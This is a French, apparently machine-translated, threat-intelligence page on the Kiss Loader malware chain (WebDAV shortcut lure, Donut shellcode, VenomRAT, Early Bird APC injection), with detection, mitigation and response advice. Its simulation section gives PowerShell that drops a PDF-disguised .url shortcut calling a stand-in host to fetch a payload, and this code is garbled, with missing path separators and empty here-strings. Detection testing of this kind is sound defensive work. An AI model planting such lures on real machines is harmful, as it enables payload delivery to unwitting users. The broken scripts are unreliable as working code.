Quand les logiciels malveillants répondent : interaction en temps réel avec un acteur de la menace lors de l’analyse de Kiss Loader
Suivre 
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Recherche par G DATA Security Center examine un chargeur nouvellement identifié nommé Kiss Loader. L’article examine un chargeur nouvellement identifié nommé Kiss Loader, distribué via un raccourci Windows qui pointe vers un dépôt WebDAV exposé via un tunnel TryCloudflare. Une fois lancé, le chargeur décrypte le shellcode généré par Donut, récupère des charges utiles telles que VenomRAT et un composant Kryptik, et les exécute par injection Early Bird APC dans explorer.exe. Lors de l’analyse, le chercheur a été en interaction directe avec l’opérateur du malware via une fenêtre Notepad, confirmant l’utilisation de la méthode d’injection Early Bird. Le cas souligne l’évolution rapide de l’outil et la nécessité d’une forte contenance lors de la manipulation de malwares actifs.
Enquête
Les chercheurs ont déclenché le raccourci initial dans un laboratoire contrôlé et ont tracé la chaîne d’exécution à travers un script WSH, un composant JScript, des fichiers batch, et un chargeur basé sur Python. Ils ont confirmé l’utilisation du shellcode généré par Donut, extrait les charges utiles intégrées, et documenté la méthode d’injection finale, qui enfile un APC dans un explorer.exe processus suspendu. Tout au long de la session, l’équipe a capturé la sortie d’exécution détaillée et les messages laissés par les développeurs à l’intérieur du flux du malware. Un court échange en temps réel avec l’opérateur a également confirmé à la fois la technique et l’état de développement actif du chargeur.
Atténuation
Les organisations devraient restreindre ou inspecter le trafic WebDAV délivré via des plateformes de tunneling public telles que TryCloudflare, désactiver l’exécution automatique des .url fichiers de raccourci, et appliquer des contrôles d’exécution stricts aux scripts et fichiers batch dans les chemins de démarrage accessibles aux utilisateurs. Les défenses des points de terminaison devraient détecter le comportement d’injection Early Bird APC et surveiller les processus suspendus recevant des APC en file d’attente. Les listes d’autorisation d’applications doivent également être tenues à jour pour bloquer les chargeurs Python inconnus et le shellcode basé sur Donut.
Réponse
Si l’activité de Kiss Loader est détectée, isolez immédiatement le point de terminaison, terminez les explorer.exe processus suspects démarrés dans un état suspendu, et capturez la mémoire pour une révision judiciaire. Les enquêteurs devraient identifier et bloquer l’infrastructure WebDAV associée, scanner l’hôte pour VenomRAT, Kryptik, et toutes autres charges utiles déposées, et remplacer les informations d’identification potentiellement exposées. Les journaux devraient ensuite être vérifiés pour d’autres tentatives d’intrusion, et les règles de détection mises à jour avec tous les indicateurs nouvellement observés.
Flux d’attaque
Détections
Abus possible du protocole URI Search / Search-MS (via cmdline)
Voir
Fichier raccourci Internet avec double extension a été créé (via file_event)
Voir
LOLBAS WScript / CScript (via création de processus)
Voir
IOCs (HashSha256) pour détecter : Quand le Malware Répond : Interaction en temps réel avec un acteur de menace pendant l’analyse de Kiss Loader
Voir
Injection Early Bird APC dans Explorer.exe [Création de processus Windows]
Voir
Accès initial tenté via des fichiers de raccourci WebDAV [Événement de fichier Windows]
Voir
Exécution de la simulation
Condition préalable : Le pointage de télémétrie et de base proposé doit avoir réussi.
-
Narrative & commandes d’attaque :
Un attaquant avec un accès limité à la station de travail de la victime souhaite établir une base pour un mouvement latéral. Ils élaborent un raccourci Internet Windows malveillant nommé DKM_DE000922.pdf.url qui pointe vers un partage WebDAV malveillant (http://malicious.example.com/webdav/evil.pdf). Lorsqu’un utilisateur double-clique sur le raccourci, le système tente automatiquement de monter la ressource WebDAV, amenant la victime à télécharger la charge utile sans exécuter un binaire traditionnel. La création de ce raccourci génère un événement de création de fichier qui correspond à la règle de détection.
[InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 « @powershell # Chemin où le raccourci sera déposé (par exemple, le Bureau de l'utilisateur) $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" # Contenu du fichier .url malveillant pointant vers un partage WebDAV $maliciousContent = @"# Écrivez le fichier – cette action devrait déclencher la règle de détection Set-Content -Path $maliciousPath -Value $maliciousContent -Encoding ASCII -
Script de test de régression : Le script ci-dessous reproduit les étapes exactes nécessaires pour générer la télémétrie déclenchant la détection.
[InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 « @powershell # --------------------------------------------------------- # Test de régression – Déclencher la règle Sigma pour les fichiers WebDAV .url # --------------------------------------------------------- # 1. Définir l'emplacement cible (bureau pour l'utilisateur actuel) $targetFile = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" # 2. Construire le contenu du raccourci malveillant $urlPayload = @"# 3. Écrire le raccourci (cela déclenchera un événement FileCreate) Set-Content -Path $targetFile -Value $urlPayload -Encoding ASCII Write-Host "Raccourci .url malveillant créé à $targetFile" -
Commandes de nettoyage : Supprimer le raccourci malveillant après vérification.
powershell $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" if (Test-Path $maliciousPath) { Remove-Item -Path $maliciousPath -Force Write-Host "Raccourci malveillant nettoyé." } else { Write-Host "Aucun raccourci malveillant trouvé; rien à nettoyer." }